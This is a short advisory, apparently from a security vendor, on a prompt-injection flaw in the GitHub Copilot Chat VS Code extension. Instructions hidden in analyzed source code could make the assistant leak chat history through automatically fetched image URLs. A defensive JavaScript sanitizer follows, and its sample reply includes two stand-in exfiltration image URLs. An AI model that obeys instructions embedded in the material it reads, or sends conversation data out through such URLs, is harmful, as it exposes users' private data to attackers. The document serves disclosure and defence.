GitHub Copilot Chat Vulnerable to Data Exfiltration
Published Fri, Jun 14th, 2024
Summary
The GitHub Copilot Chat VS Code extension was vulnerable to data exfiltration via prompt injection when analyzing untrusted source code. Instructions embedded in the analyzed code could make the assistant read previous conversation turns and append information from the chat history to an image URL, which Copilot then retrieved automatically, sending the data to the attacker.
Monitor for unexpected outbound image requests originating from the GitHub Copilot Chat extension. Before analyzing untrusted source code with the assistant, review it for embedded instructions that could trigger a prompt injection attack.
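As an added example (not GitHub's or the extension's own code), the following shows the rendering-side mitigation for this class of bug: markdown and HTML image references in a model reply are passed through only when they point, without a query string, at an allowlisted host, and everything else is replaced before the chat view would fetch it. The allowlist, host names and sample reply are constructed for the example.

```javascript
// Added example, not code from GitHub Copilot Chat: sanitize a model reply before
// the chat view renders it, so an image URL carrying chat-history data is never fetched.

const IMAGE_MD = /!\[([^\]]*)\]\(\s*(<[^>]*>|[^\s)]+)[^)]*\)/g;         // ![alt](url "title")
const IMAGE_HTML = /<img\b[^>]*\bsrc\s*=\s*["']?([^"'\s>]+)[^>]*>/gi;  // <img src=...>

// An image may be rendered only if it is https, has no credentials, carries no
// query string (the channel used to smuggle data out), and its host is allowlisted.
function isAllowed(rawUrl, allowedHosts) {
  let url;
  try {
    url = new URL(rawUrl.replace(/^<|>$/g, ''));
  } catch {
    return false; // relative or malformed URLs are not rendered either
  }
  if (url.protocol !== 'https:') return false;
  if (url.username || url.password) return false;
  if (url.search) return false;
  return allowedHosts.includes(url.hostname.toLowerCase());
}

// Returns the sanitized markdown plus the list of image URLs that were blocked,
// which is also what a detection pipeline would want to log.
function sanitizeChatMarkdown(markdown, allowedHosts) {
  const blocked = [];
  const out = markdown
    .replace(IMAGE_MD, (match, alt, url) => {
      if (isAllowed(url, allowedHosts)) return match;
      blocked.push(url);
      return `[image blocked: ${alt || 'untrusted source'}]`;
    })
    .replace(IMAGE_HTML, (match, src) => {
      if (isAllowed(src, allowedHosts)) return match;
      blocked.push(src);
      return '[image blocked]';
    });
  return { markdown: out, blocked };
}

// Constructed sample reply: one legitimate image and two that would leak
// earlier conversation content through the query string of an image URL.
const ALLOWED_HOSTS = ['docs.example.com']; // assumption: the deployment's trusted image hosts
const SAMPLE_REPLY = [
  'Here is the refactored function.',
  '![diagram](https://docs.example.com/arch.png "architecture")',
  '![](https://untrusted.invalid/px.png?q=PREVIOUS_TURN_CONTENT)',
  '<img src="https://untrusted.invalid/p.gif?c=PREVIOUS_TURN_CONTENT">',
].join('\n');

console.log(sanitizeChatMarkdown(SAMPLE_REPLY, ALLOWED_HOSTS));
```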